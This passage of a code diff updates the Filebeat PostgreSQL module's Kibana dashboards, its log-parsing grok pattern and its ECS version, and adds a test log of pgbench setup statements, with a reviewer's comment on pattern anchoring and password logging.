true, - "style": {}, - "title": { - "text": "@timestamp per month" - }, - "type": "category" - } - ], - "grid": { - "categoryLines": false, - "style": { - "color": "#eee" - } - }, - "legendPosition": "right", - "seriesParams": [ - { - "data": { - "id": "1", - "label": "Count" - }, - "drawLinesBetweenPoints": true, - "mode": "stacked", - "show": "true", - "showCircles": true, - "type": "histogram", - "valueAxis": "ValueAxis-1" - } - ], - "times": [], - "type": "histogram", - "valueAxes": [ - { - "id": "ValueAxis-1", - "labels": { - "filter": false, - "rotate": 0, - "show": true, - "truncate": 100 - }, - "name": "LeftAxis-1", - "position": "left", - "scale": { - "mode": "normal", - "type": "linear" - }, - "show": true, - "style": {}, - "title": { - "text": "Count" - }, - "type": "value" - } - ] - }, - "title": "Logs by level over time [Filebeat PostgreSQL] ECS", - "type": "histogram" + "id": "filebeat-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "type": "index-pattern" + } + ], + "type": "search", + "updated_at": "2021-03-17T16:32:17.646Z", + "version": "WzMxMSwxXQ==" + }, + { + "attributes": { + "description": "", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "key": "event.dataset", + "negate": false, + "params": { + "query": "postgresql.log" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.dataset": "postgresql.log" + } } - }, - "id": "3dbd5370-87f3-11e7-ad9c-db80de0bf8d3-ecs", - "type": "visualization", - "version": 1 - }, + } + ], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "savedSearchRefName": "search_0", + "title": "Logs by level over time [Filebeat PostgreSQL] ECS", + "uiStateJSON": {}, + "version": 1, + "visState": { + "aggs": [ + { + "enabled": true, + "id": "1", + "params": {}, + 
"schema": "metric", + "type": "count" + }, + { + "enabled": true, + "id": "2", + "params": { + "drop_partials": false, + "extended_bounds": {}, + "field": "@timestamp", + "interval": "auto", + "min_doc_count": 1, + "scaleMetricValues": false, + "timeRange": { + "from": "now-15m", + "to": "now" + }, + "useNormalizedEsInterval": true + }, + "schema": "segment", + "type": "date_histogram" + }, + { + "enabled": true, + "id": "3", + "params": { + "field": "log.level", + "missingBucket": false, + "missingBucketLabel": "Missing", + "order": "desc", + "orderBy": "1", + "otherBucket": false, + "otherBucketLabel": "Other", + "size": 5 + }, + "schema": "group", + "type": "terms" + } + ], + "params": { + "addLegend": true, + "addTimeMarker": false, + "addTooltip": true, + "categoryAxes": [ + { + "id": "CategoryAxis-1", + "labels": { + "show": true, + "truncate": 100 + }, + "position": "bottom", + "scale": { + "type": "linear" + }, + "show": true, + "style": {}, + "title": { + "text": "@timestamp per month" + }, + "type": "category" + } + ], + "grid": { + "categoryLines": false, + "style": { + "color": "#eee" + } + }, + "labels": { + "show": false + }, + "legendPosition": "right", + "seriesParams": [ + { + "data": { + "id": "1", + "label": "Count" + }, + "drawLinesBetweenPoints": true, + "mode": "stacked", + "show": "true", + "showCircles": true, + "type": "histogram", + "valueAxis": "ValueAxis-1" + } + ], + "thresholdLine": { + "color": "#E7664C", + "show": false, + "style": "full", + "value": 10, + "width": 1 + }, + "times": [], + "type": "histogram", + "valueAxes": [ + { + "id": "ValueAxis-1", + "labels": { + "filter": false, + "rotate": 0, + "show": true, + "truncate": 100 + }, + "name": "LeftAxis-1", + "position": "left", + "scale": { + "mode": "normal", + "type": "linear" + }, + "show": true, + "style": {}, + "title": { + "text": "Count" + }, + "type": "value" + } + ] + }, + "title": "Logs by level over time [Filebeat PostgreSQL] ECS", + "type": "histogram" + } + }, + 
"id": "3dbd5370-87f3-11e7-ad9c-db80de0bf8d3-ecs", + "migrationVersion": { + "visualization": "7.10.0" + }, + "namespaces": [ + "default" + ], + "references": [ + { + "id": "filebeat-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "type": "index-pattern" + }, { - "attributes": { - "description": "Overview dashboard for the Filebeat PostgreSQL module", - "hits": 0, - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [], - "highlightAll": true, - "query": { - "language": "kuery", - "query": "" - }, - "version": true - } - }, - "optionsJSON": { - "darkTheme": false - }, - "panelsJSON": [ - { - "col": 1, - "id": "PostgreSQL Log Level Count-ecs", - "panelIndex": 1, - "row": 1, - "size_x": 3, - "size_y": 3, - "type": "visualization" - }, - { - "col": 1, - "columns": [ - "user.name", - "postgresql.log.database", - "log.level", - "message", - "postgresql.log.query" - ], - "id": "PostgreSQL All Logs-ecs", - "panelIndex": 2, - "row": 4, - "size_x": 12, - "size_y": 6, - "sort": [ - "@timestamp", - "desc" - ], - "type": "search" - }, - { - "col": 4, - "id": "3dbd5370-87f3-11e7-ad9c-db80de0bf8d3-ecs", - "panelIndex": 3, - "row": 1, - "size_x": 9, - "size_y": 3, - "type": "visualization" - } - ], - "timeRestore": false, - "title": "[Filebeat PostgreSQL] Overview ECS", - "uiStateJSON": { - "P-1": { - "vis": { - "params": { - "sort": { - "columnIndex": null, - "direction": null - } - } - } - } - }, - "version": 1 - }, - "id": "158be870-87f4-11e7-ad9c-db80de0bf8d3-ecs", - "type": "dashboard", - "version": 1 + "id": "PostgreSQL All Logs-ecs", + "name": "search_0", + "type": "search" } - ], - "version": "6.0.0-beta1-SNAPSHOT" -} \ No newline at end of file + ], + "type": "visualization", + "updated_at": "2021-03-17T16:31:38.064Z", + "version": "WzMwNSwxXQ==" + } + ], + "version": "7.10.0" +} 
diff --git a/filebeat/module/postgresql/_meta/kibana/7/dashboard/Filebeat-Postgresql-slowlogs.json b/filebeat/module/postgresql/_meta/kibana/7/dashboard/Filebeat-Postgresql-slowlogs.json index d5203c91d0d..0e06097a5a3 100644 --- a/filebeat/module/postgresql/_meta/kibana/7/dashboard/Filebeat-Postgresql-slowlogs.json +++ b/filebeat/module/postgresql/_meta/kibana/7/dashboard/Filebeat-Postgresql-slowlogs.json 
@@ -1,300 +1,426 @@ { - "objects": [ + "objects": [ + { + "attributes": { + "description": "Dashboard for analyzing the query durations of the Filebeat PostgreSQL module", + "hits": 0, + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "highlightAll": true, + "query": { + "language": "kuery", + "query": "" + }, + "version": true + } + }, + "optionsJSON": { + "darkTheme": false + }, + "panelsJSON": [ + { + "embeddableConfig": {}, + "gridData": { + "h": 12, + "i": "1", + "w": 24, + "x": 0, + "y": 0 + }, + "panelIndex": "1", + "panelRefName": "panel_0", + "version": "7.10.0" + }, + { + "embeddableConfig": { + "columns": [ + "user.name", + "postgresql.log.database", + "event.duration", + "postgresql.log.query" + ], + "sort": [ + "@timestamp", + "desc" + ] + }, + "gridData": { + "h": 12, + "i": "2", + "w": 24, + "x": 24, + "y": 0 + }, + "panelIndex": "2", + "panelRefName": "panel_1", + "version": "7.10.0" + }, + { + "embeddableConfig": { + "columns": [ + "user.name", + "postgresql.log.database", + "event.duration", + "postgresql.log.query" + ], + "sort": [ + "@timestamp", + "desc" + ] + }, + "gridData": { + "h": 20, + "i": "3", + "w": 48, + "x": 0, + "y": 12 + }, + "panelIndex": "3", + "panelRefName": "panel_2", + "version": "7.10.0" + } + ], + "timeRestore": false, + "title": "[Filebeat PostgreSQL] Query Duration Overview ECS", + "version": 1 + }, + "id": "e4c5f230-87f3-11e7-ad9c-db80de0bf8d3-ecs", + "migrationVersion": { + "dashboard": "7.9.3" + }, + "namespaces": [ + "default" + ], + "references": [ { - "attributes": { - "description": "", - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [], - "query": { - "language": "kuery", - "query": "" - } - } - }, - "savedSearchId": "PostgreSQL Query Durations-ecs", - "title": "Query count and cumulated duration [Filebeat PostgreSQL] ECS", - "uiStateJSON": { - "vis": { - "colors": { - "Number of queries": "#0A437C", - "Sum of query duration": "#6ED0E0" - }, - "legendOpen": true - } - }, - 
"version": 1, - "visState": { - "aggs": [ - { - "enabled": true, - "id": "3", - "params": { - "customInterval": "2h", - "extended_bounds": {}, - "field": "@timestamp", - "interval": "auto", - "min_doc_count": 1 - }, - "schema": "segment", - "type": "date_histogram" - }, - { - "enabled": true, - "id": "4", - "params": { - "customLabel": "Number of queries" - }, - "schema": "metric", - "type": "count" - }, - { - "enabled": true, - "id": "2", - "params": { - "customLabel": "Sum of query duration", - "field": "event.duration" - }, - "schema": "metric", - "type": "sum" - } - ], - "params": { - "addLegend": true, - "addTimeMarker": false, - "addTooltip": true, - "categoryAxes": [ - { - "id": "CategoryAxis-1", - "labels": { - "show": true, - "truncate": 100 - }, - "position": "bottom", - "scale": { - "type": "linear" - }, - "show": true, - "style": {}, - "title": { - "text": "@timestamp per 3 hours" - }, - "type": "category" - } - ], - "grid": { - "categoryLines": false, - "style": { - "color": "#eee" - } - }, - "legendPosition": "right", - "seriesParams": [ - { - "data": { - "id": "4", - "label": "Number of queries" - }, - "drawLinesBetweenPoints": true, - "interpolate": "linear", - "lineWidth": 2, - "mode": "normal", - "show": true, - "showCircles": true, - "type": "histogram", - "valueAxis": "ValueAxis-1" - }, - { - "data": { - "id": "2", - "label": "Sum of query duration" - }, - "drawLinesBetweenPoints": true, - "interpolate": "linear", - "lineWidth": 2, - "mode": "normal", - "show": true, - "showCircles": true, - "type": "histogram", - "valueAxis": "ValueAxis-1" - } - ], - "times": [], - "type": "histogram", - "valueAxes": [ - { - "id": "ValueAxis-1", - "labels": { - "filter": false, - "rotate": 0, - "show": true, - "truncate": 100 - }, - "name": "LeftAxis-1", - "position": "left", - "scale": { - "mode": "normal", - "type": "linear" - }, - "show": true, - "style": {}, - "title": { - "text": "" - }, - "type": "value" - } - ] - }, - "title": "Query count and cumulated 
duration [Filebeat PostgreSQL] ECS", - "type": "histogram" + "id": "PostgreSQL Query Count and Duration-ecs", + "name": "panel_0", + "type": "visualization" + }, + { + "id": "Slow PostgreSQL Queries-ecs", + "name": "panel_1", + "type": "search" + }, + { + "id": "PostgreSQL Query Durations-ecs", + "name": "panel_2", + "type": "search" + } + ], + "type": "dashboard", + "updated_at": "2021-03-17T16:18:35.298Z", + "version": "WzI1NywxXQ==" + }, + { + "attributes": { + "description": "", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "key": "event.dataset", + "negate": false, + "params": { + "query": "postgresql.log" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.dataset": "postgresql.log" + } } - }, - "id": "PostgreSQL Query Count and Duration-ecs", - "type": "visualization", - "version": 1 - }, + } + ], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "savedSearchRefName": "search_0", + "title": "Query count and cumulated duration [Filebeat PostgreSQL] ECS", + "uiStateJSON": { + "vis": { + "colors": { + "Number of queries": "#0A437C", + "Sum of query duration": "#6ED0E0" + }, + "legendOpen": true + } + }, + "version": 1, + "visState": { + "aggs": [ + { + "enabled": true, + "id": "3", + "params": { + "drop_partials": false, + "extended_bounds": {}, + "field": "@timestamp", + "interval": "auto", + "min_doc_count": 1, + "scaleMetricValues": false, + "timeRange": { + "from": "now-15m", + "to": "now" + }, + "useNormalizedEsInterval": true + }, + "schema": "segment", + "type": "date_histogram" + }, + { + "enabled": true, + "id": "4", + "params": { + "customLabel": "Number of queries" + }, + "schema": "metric", + "type": "count" + }, + { + "enabled": true, + "id": "2", + "params": { + "customLabel": "Sum of query duration", + "field": 
"event.duration" + }, + "schema": "metric", + "type": "sum" + } + ], + "params": { + "addLegend": true, + "addTimeMarker": false, + "addTooltip": true, + "categoryAxes": [ + { + "id": "CategoryAxis-1", + "labels": { + "show": true, + "truncate": 100 + }, + "position": "bottom", + "scale": { + "type": "linear" + }, + "show": true, + "style": {}, + "title": { + "text": "@timestamp per 3 hours" + }, + "type": "category" + } + ], + "grid": { + "categoryLines": false, + "style": { + "color": "#eee" + } + }, + "labels": { + "show": false + }, + "legendPosition": "right", + "seriesParams": [ + { + "data": { + "id": "4", + "label": "Number of queries" + }, + "drawLinesBetweenPoints": true, + "interpolate": "linear", + "lineWidth": 2, + "mode": "normal", + "show": true, + "showCircles": true, + "type": "histogram", + "valueAxis": "ValueAxis-1" + }, + { + "data": { + "id": "2", + "label": "Sum of query duration" + }, + "drawLinesBetweenPoints": true, + "interpolate": "linear", + "lineWidth": 2, + "mode": "normal", + "show": true, + "showCircles": true, + "type": "histogram", + "valueAxis": "ValueAxis-1" + } + ], + "thresholdLine": { + "color": "#E7664C", + "show": false, + "style": "full", + "value": 10, + "width": 1 + }, + "times": [], + "type": "histogram", + "valueAxes": [ + { + "id": "ValueAxis-1", + "labels": { + "filter": false, + "rotate": 0, + "show": true, + "truncate": 100 + }, + "name": "LeftAxis-1", + "position": "left", + "scale": { + "mode": "normal", + "type": "linear" + }, + "show": true, + "style": {}, + "title": { + "text": "" + }, + "type": "value" + } + ] + }, + "title": "Query count and cumulated duration [Filebeat PostgreSQL] ECS", + "type": "histogram" + } + }, + "id": "PostgreSQL Query Count and Duration-ecs", + "migrationVersion": { + "visualization": "7.10.0" + }, + "namespaces": [ + "default" + ], + "references": [ { - "attributes": { - "columns": [ - "user.name", - "postgresql.log.database", - "event.duration", - "postgresql.log.query" - ], - 
"description": "", - "hits": 0, - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [], - "highlightAll": true, - "index": "filebeat-*", - "query": { - "language": "kuery", - "query": "event.duration>30000000" - }, - "version": true - } - }, - "sort": [ - "@timestamp", - "desc" - ], - "title": "Slow Queries [Filebeat PostgreSQL] ECS", - "version": 1 - }, - "id": "Slow PostgreSQL Queries-ecs", - "type": "search", - "version": 1 - }, + "id": "filebeat-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "type": "index-pattern" + }, { - "attributes": { - "columns": [ - "user.name", - "postgresql.log.database", - "event.duration", - "postgresql.log.query" - ], - "description": "", - "hits": 0, - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [], - "highlightAll": true, - "index": "filebeat-*", - "query": { - "language": "kuery", - "query": "event.duration:*" - }, - "version": true - } - }, - "sort": [ - "@timestamp", - "desc" - ], - "title": "Query Durations [Filebeat PostgreSQL] ECS", - "version": 1 - }, - "id": "PostgreSQL Query Durations-ecs", - "type": "search", - "version": 1 - }, + "id": "PostgreSQL Query Durations-ecs", + "name": "search_0", + "type": "search" + } + ], + "type": "visualization", + "updated_at": "2021-03-17T16:24:41.475Z", + "version": "WzI3MSwxXQ==" + }, + { + "attributes": { + "columns": [ + "user.name", + "postgresql.log.database", + "event.duration", + "postgresql.log.query" + ], + "description": "", + "hits": 0, + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "highlightAll": true, + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.index", + "query": { + "language": "kuery", + "query": "event.dataset:\"postgresql.log\" AND event.duration\u003e30000000" + }, + "version": true + } + }, + "sort": [ + [ + "@timestamp", + "desc" + ] + ], + "title": "Slow Queries [Filebeat PostgreSQL] ECS", + "version": 1 + }, + "id": "Slow PostgreSQL Queries-ecs", + 
"migrationVersion": { + "search": "7.9.3" + }, + "namespaces": [ + "default" + ], + "references": [ + { + "id": "filebeat-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.index", + "type": "index-pattern" + } + ], + "type": "search", + "updated_at": "2021-03-17T16:25:43.870Z", + "version": "WzI4NSwxXQ==" + }, + { + "attributes": { + "columns": [ + "user.name", + "postgresql.log.database", + "event.duration", + "postgresql.log.query" + ], + "description": "", + "hits": 0, + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "highlightAll": true, + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.index", + "query": { + "language": "kuery", + "query": "event.dataset:\"postgresql.log\" AND event.duration:*" + }, + "version": true + } + }, + "sort": [ + [ + "@timestamp", + "desc" + ] + ], + "title": "Query Durations [Filebeat PostgreSQL] ECS", + "version": 1 + }, + "id": "PostgreSQL Query Durations-ecs", + "migrationVersion": { + "search": "7.9.3" + }, + "namespaces": [ + "default" + ], + "references": [ { - "attributes": { - "description": "Dashboard for analyzing the query durations of the Filebeat PostgreSQL module", - "hits": 0, - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [], - "highlightAll": true, - "query": { - "language": "kuery", - "query": "postgresql.log.query:*" - }, - "version": true - } - }, - "optionsJSON": { - "darkTheme": false - }, - "panelsJSON": [ - { - "col": 1, - "id": "PostgreSQL Query Count and Duration-ecs", - "panelIndex": 1, - "row": 1, - "size_x": 6, - "size_y": 3, - "type": "visualization" - }, - { - "col": 7, - "columns": [ - "user.name", - "postgresql.log.database", - "event.duration", - "postgresql.log.query" - ], - "id": "Slow PostgreSQL Queries-ecs", - "panelIndex": 2, - "row": 1, - "size_x": 6, - "size_y": 3, - "sort": [ - "@timestamp", - "desc" - ], - "type": "search" - }, - { - "col": 1, - "columns": [ - "user.name", - "postgresql.log.database", - "event.duration", - 
"postgresql.log.query" - ], - "id": "PostgreSQL Query Durations-ecs", - "panelIndex": 3, - "row": 4, - "size_x": 12, - "size_y": 5, - "sort": [ - "@timestamp", - "desc" - ], - "type": "search" - } - ], - "timeRestore": false, - "title": "[Filebeat PostgreSQL] Query Duration Overview ECS", - "uiStateJSON": {}, - "version": 1 - }, - "id": "e4c5f230-87f3-11e7-ad9c-db80de0bf8d3-ecs", - "type": "dashboard", - "version": 1 + "id": "filebeat-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.index", + "type": "index-pattern" } - ], - "version": "6.0.0-beta1-SNAPSHOT" + ], + "type": "search", + "updated_at": "2021-03-17T16:23:19.900Z", + "version": "WzI2NCwxXQ==" + } + ], + "version": "7.10.0" } diff --git a/filebeat/module/postgresql/log/config/log.yml b/filebeat/module/postgresql/log/config/log.yml index c33a4ad8de4..30e165d6282 100644 --- a/filebeat/module/postgresql/log/config/log.yml +++ b/filebeat/module/postgresql/log/config/log.yml @@ -12,4 +12,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/filebeat/module/postgresql/log/ingest/pipeline-log.yml b/filebeat/module/postgresql/log/ingest/pipeline-log.yml index 3ca507d58ba..250d346b814 100644 --- a/filebeat/module/postgresql/log/ingest/pipeline-log.yml +++ b/filebeat/module/postgresql/log/ingest/pipeline-log.yml 
@@ -4,7 +4,7 @@ processors:
 field: raw_message
 ignore_missing: true
 patterns:
- - '^(\[%{NUMBER:process.pid:long}(-%{BASE16FLOAT:postgresql.log.session_line_number:long})?\] ((\[%{USERNAME:user.name}\]@\[%{POSTGRESQL_DB_NAME:postgresql.log.database}\]|%{USERNAME:user.name}@%{POSTGRESQL_DB_NAME:postgresql.log.database}) )?)?%{WORD:log.level}: (?:%{POSTGRESQL_ERROR:postgresql.log.sql_state_code}|%{SPACE})(duration: %{NUMBER:temp.duration:float} ms %{POSTGRESQL_QUERY_STEP}: %{GREEDYDATA:postgresql.log.query}|: %{GREEDYDATA:message}|%{GREEDYDATA:message})'
+ - '^(\[%{NUMBER:process.pid:long}(-%{BASE16FLOAT:postgresql.log.session_line_number:long})?\] ((\[%{USERNAME:user.name}\]@\[%{POSTGRESQL_DB_NAME:postgresql.log.database}\]|%{USERNAME:user.name}@%{POSTGRESQL_DB_NAME:postgresql.log.database}) )?)?%{WORD:log.level}: (?:%{POSTGRESQL_ERROR:postgresql.log.sql_state_code}|%{SPACE})(duration: %{NUMBER:temp.duration:float} ms( %{POSTGRESQL_QUERY_STEP}: %{GREEDYDATA:postgresql.log.query})?|statement: %{GREEDYDATA:postgresql.log.query}|: %{GREEDYDATA:message}|%{GREEDYDATA:message})'
 pattern_definitions:
 GREEDYDATA: |-
 (.|
diff --git a/filebeat/module/postgresql/log/test/postgresql-13-log-statement-all.log b/filebeat/module/postgresql/log/test/postgresql-13-log-statement-all.log
new file mode 100644
index 00000000000..2755525218c
--- /dev/null
+++ b/filebeat/module/postgresql/log/test/postgresql-13-log-statement-all.log
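Review bot: The new bare-duration form `duration: %{NUMBER:temp.duration:float} ms( … )?` has no end anchor, so a line whose text after `ms` does not fit `%{POSTGRESQL_QUERY_STEP}: …` now matches with the optional group empty and the rest of the line lands in no field; before this change such a line fell through to `%{GREEDYDATA:message}`. Losing that tail silently is worse for later investigation than an unparsed message, so I would anchor the bare form, e.g. `ms( %{POSTGRESQL_QUERY_STEP}: %{GREEDYDATA:postgresql.log.query})?$`, and add a fixture line with trailing text after the duration to pin the behaviour. This assumes grok is not implicitly end-anchored here (the explicit `^` suggests it is not) and that `POSTGRESQL_QUERY_STEP` does not cover every suffix; its definition, like the rest of `pattern_definitions`, lies outside the hunk. The new `statement:` branch also stores the full SQL text in `postgresql.log.query`, so with statement logging enabled a password set through SQL would be indexed verbatim, which the module docs should state next to the logging options.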
@@ -0,0 +1,235 @@ +2021-03-17 15:18:00.201 UTC [149] postgres@postgres LOG: statement: CREATE DATABASE accounts; +2021-03-17 15:18:00.631 UTC [149] postgres@postgres LOG: duration: 430.394 ms +2021-03-17 15:18:02.732 UTC [151] postgres@accounts LOG: statement: drop table if exists pgbench_accounts, pgbench_branches, pgbench_history, pgbench_tellers +2021-03-17 15:18:02.732 UTC [151] postgres@accounts LOG: duration: 0.559 ms +2021-03-17 15:18:02.732 UTC [151] postgres@accounts LOG: statement: create table pgbench_history(tid int,bid int,aid int,delta int,mtime timestamp,filler char(22)) +2021-03-17 15:18:02.737 UTC [151] postgres@accounts LOG: duration: 4.812 ms +2021-03-17 15:18:02.738 UTC [151] postgres@accounts LOG: statement: create table pgbench_tellers(tid int not null,bid int,tbalance int,filler char(84)) with (fillfactor=100) +2021-03-17 15:18:02.740 UTC [151] postgres@accounts LOG: duration: 1.900 ms +2021-03-17 15:18:02.740 UTC [151] postgres@accounts LOG: statement: create table pgbench_accounts(aid int not null,bid int,abalance int,filler char(84)) with (fillfactor=100) +2021-03-17 15:18:02.741 UTC [151] postgres@accounts LOG: duration: 1.444 ms +2021-03-17 15:18:02.741 UTC [151] postgres@accounts LOG: statement: create table pgbench_branches(bid int not null,bbalance int,filler char(88)) with (fillfactor=100) +2021-03-17 15:18:02.743 UTC [151] postgres@accounts LOG: duration: 1.336 ms +2021-03-17 15:18:02.743 UTC [151] postgres@accounts LOG: statement: begin +2021-03-17 15:18:02.743 UTC [151] postgres@accounts LOG: duration: 0.068 ms +2021-03-17 15:18:02.743 UTC [151] postgres@accounts LOG: statement: truncate table pgbench_accounts, pgbench_branches, pgbench_history, pgbench_tellers +2021-03-17 15:18:02.744 UTC [151] postgres@accounts LOG: duration: 0.656 ms +2021-03-17 15:18:02.744 UTC [151] postgres@accounts LOG: statement: insert into pgbench_branches(bid,bbalance) values(1,0) +2021-03-17 15:18:02.744 UTC [151] postgres@accounts LOG: duration: 0.538 
ms +2021-03-17 15:18:02.744 UTC [151] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (1,1,0) +2021-03-17 15:18:02.745 UTC [151] postgres@accounts LOG: duration: 0.304 ms +2021-03-17 15:18:02.745 UTC [151] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (2,1,0) +2021-03-17 15:18:02.746 UTC [151] postgres@accounts LOG: duration: 1.510 ms +2021-03-17 15:18:02.746 UTC [151] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (3,1,0) +2021-03-17 15:18:02.746 UTC [151] postgres@accounts LOG: duration: 0.094 ms +2021-03-17 15:18:02.746 UTC [151] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (4,1,0) +2021-03-17 15:18:02.746 UTC [151] postgres@accounts LOG: duration: 0.056 ms +2021-03-17 15:18:02.746 UTC [151] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (5,1,0) +2021-03-17 15:18:02.746 UTC [151] postgres@accounts LOG: duration: 0.052 ms +2021-03-17 15:18:02.747 UTC [151] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (6,1,0) +2021-03-17 15:18:02.747 UTC [151] postgres@accounts LOG: duration: 0.051 ms +2021-03-17 15:18:02.747 UTC [151] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (7,1,0) +2021-03-17 15:18:02.747 UTC [151] postgres@accounts LOG: duration: 0.051 ms +2021-03-17 15:18:02.747 UTC [151] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (8,1,0) +2021-03-17 15:18:02.747 UTC [151] postgres@accounts LOG: duration: 0.050 ms +2021-03-17 15:18:02.747 UTC [151] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (9,1,0) +2021-03-17 15:18:02.747 UTC [151] postgres@accounts LOG: duration: 0.052 ms +2021-03-17 15:18:02.747 UTC [151] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (10,1,0) 
+2021-03-17 15:18:02.747 UTC [151] postgres@accounts LOG: duration: 0.052 ms +2021-03-17 15:18:02.747 UTC [151] postgres@accounts LOG: statement: copy pgbench_accounts from stdin +2021-03-17 15:18:02.987 UTC [151] postgres@accounts LOG: duration: 239.763 ms +2021-03-17 15:18:02.987 UTC [151] postgres@accounts LOG: statement: commit +2021-03-17 15:18:03.054 UTC [151] postgres@accounts LOG: duration: 67.302 ms +2021-03-17 15:18:03.057 UTC [151] postgres@accounts LOG: statement: vacuum analyze pgbench_branches +2021-03-17 15:18:03.073 UTC [151] postgres@accounts LOG: duration: 15.246 ms +2021-03-17 15:18:03.073 UTC [151] postgres@accounts LOG: statement: vacuum analyze pgbench_tellers +2021-03-17 15:18:03.076 UTC [151] postgres@accounts LOG: duration: 3.531 ms +2021-03-17 15:18:03.077 UTC [151] postgres@accounts LOG: statement: vacuum analyze pgbench_accounts +2021-03-17 15:18:03.157 UTC [151] postgres@accounts LOG: duration: 80.735 ms +2021-03-17 15:18:03.158 UTC [151] postgres@accounts LOG: statement: vacuum analyze pgbench_history +2021-03-17 15:18:03.159 UTC [151] postgres@accounts LOG: duration: 0.893 ms +2021-03-17 15:18:03.159 UTC [151] postgres@accounts LOG: statement: alter table pgbench_branches add primary key (bid) +2021-03-17 15:18:03.165 UTC [151] postgres@accounts LOG: duration: 5.266 ms +2021-03-17 15:18:03.165 UTC [151] postgres@accounts LOG: statement: alter table pgbench_tellers add primary key (tid) +2021-03-17 15:18:03.168 UTC [151] postgres@accounts LOG: duration: 2.807 ms +2021-03-17 15:18:03.168 UTC [151] postgres@accounts LOG: statement: alter table pgbench_accounts add primary key (aid) +2021-03-17 15:18:03.249 UTC [151] postgres@accounts LOG: duration: 81.593 ms +2021-03-17 15:18:04.110 UTC [154] postgres@accounts LOG: statement: drop table if exists pgbench_accounts, pgbench_branches, pgbench_history, pgbench_tellers +2021-03-17 15:18:04.130 UTC [154] postgres@accounts LOG: duration: 20.521 ms +2021-03-17 15:18:04.132 UTC [154] 
postgres@accounts LOG: statement: create table pgbench_history(tid int,bid int,aid int,delta int,mtime timestamp,filler char(22)) +2021-03-17 15:18:04.143 UTC [154] postgres@accounts LOG: duration: 11.098 ms +2021-03-17 15:18:04.143 UTC [154] postgres@accounts LOG: statement: create table pgbench_tellers(tid int not null,bid int,tbalance int,filler char(84)) with (fillfactor=100) +2021-03-17 15:18:04.152 UTC [154] postgres@accounts LOG: duration: 8.950 ms +2021-03-17 15:18:04.152 UTC [154] postgres@accounts LOG: statement: create table pgbench_accounts(aid int not null,bid int,abalance int,filler char(84)) with (fillfactor=100) +2021-03-17 15:18:04.156 UTC [154] postgres@accounts LOG: duration: 4.302 ms +2021-03-17 15:18:04.156 UTC [154] postgres@accounts LOG: statement: create table pgbench_branches(bid int not null,bbalance int,filler char(88)) with (fillfactor=100) +2021-03-17 15:18:04.163 UTC [154] postgres@accounts LOG: duration: 6.999 ms +2021-03-17 15:18:04.164 UTC [154] postgres@accounts LOG: statement: begin +2021-03-17 15:18:04.164 UTC [154] postgres@accounts LOG: duration: 0.075 ms +2021-03-17 15:18:04.164 UTC [154] postgres@accounts LOG: statement: truncate table pgbench_accounts, pgbench_branches, pgbench_history, pgbench_tellers +2021-03-17 15:18:04.164 UTC [154] postgres@accounts LOG: duration: 0.676 ms +2021-03-17 15:18:04.164 UTC [154] postgres@accounts LOG: statement: insert into pgbench_branches(bid,bbalance) values(1,0) +2021-03-17 15:18:04.165 UTC [154] postgres@accounts LOG: duration: 0.247 ms +2021-03-17 15:18:04.165 UTC [154] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (1,1,0) +2021-03-17 15:18:04.165 UTC [154] postgres@accounts LOG: duration: 0.164 ms +2021-03-17 15:18:04.165 UTC [154] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (2,1,0) +2021-03-17 15:18:04.165 UTC [154] postgres@accounts LOG: duration: 0.080 ms +2021-03-17 15:18:04.165 UTC [154] 
